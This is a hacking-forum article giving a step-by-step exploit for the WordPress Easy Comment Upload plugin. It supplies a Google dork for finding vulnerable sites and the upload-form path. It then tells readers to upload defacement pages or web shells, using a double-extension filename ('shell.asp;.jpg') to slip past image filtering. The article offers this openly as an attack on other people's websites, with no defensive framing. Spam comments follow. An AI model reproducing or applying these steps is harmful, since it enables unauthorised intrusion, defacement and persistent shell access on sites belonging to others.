WordPress Easy Comment Upload (Plugin) Exploit (10,000 Websites are Vulnerable for this Attack) - Exploits and Vulenrablities - Web Hacking - Hacking - GeniusHackers.Net
Main » Articles » Web Hacking » Exploits and Vulenrablities

WordPress Easy Comment Upload (Plugin) Exploit (10,000 Websites are Vulnerable for this Attack)
Title: WordPress Easy Comment Upload (Plugin) Exploit 
Author: R00T-HaXor

Lets Start,
Open Google Search and type the given below dork.
Google Dork 
"inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php" 
/wp-content/plugins/easy-comment-uploads/upload-form.php
Index of /wp-content/plugins/easy-comment-uploads

Select website from search results. The exploit URL will be like this
Exploit
site.com/wp-content/plugins/easy-comment-uploads/upload-form.php
You will Got Upload Option there. Now Upload Your Deface and to check it here site.com/wp-content/uploads/2011/05/yourfilehere


Note
In some websites you can Upload your deface in txt only and you can upload shell in 50% sites only. Upload shell in image format i.e., 
shell.asp;.jpg


Live Demo
Category: Exploits and Vulenrablities | Added by: MaX-HaCker (12.08.17)
Views: 1487 | Comments: 11 | Rating: 5.0/1
Total comments: 4
0   Spam
4 buffkessy   (12.11.05 7:28 AM)
Хочу заказать рекламу у вас, куда писать?

0   Spam
3 Stacy Williams   (12.09.25 12:45 PM)
This article provide many tips. Very useful to me. Thanks a lot ?

0   Spam
2 Edna N Ramirez   (12.09.18 3:45 PM)
The new Zune browser is surprisingly good, but not as good as the iPod's. It works well, but isn't as fast as Safari, and has a clunkier interface. If you occasionally plan on using the web browser that's not an issue, but if you're planning to browse the web alot from your PMP then the iPod's larger screen and better browser may be important.

0   Spam
1 Dragana Vuckovic   (12.08.21 4:50 PM)
[color=gray]

Only registered users can add comments.
[ Registration | Login ]
Like us on FacebookFollow us on Twitter
Recommend on Google
Our Media
Our Media

Our Blog
Our Blog

Designed By [#]./3X3.R()()T
Like Us on Facebook Follow Us on Twitter Subscribe Us on Youtube WWW.GeniusHackers.NET © 2016
Founder and CEO of GeniusHackers [#] /3x3.R()()T
Hosted by uCoz
Hosted by uCoz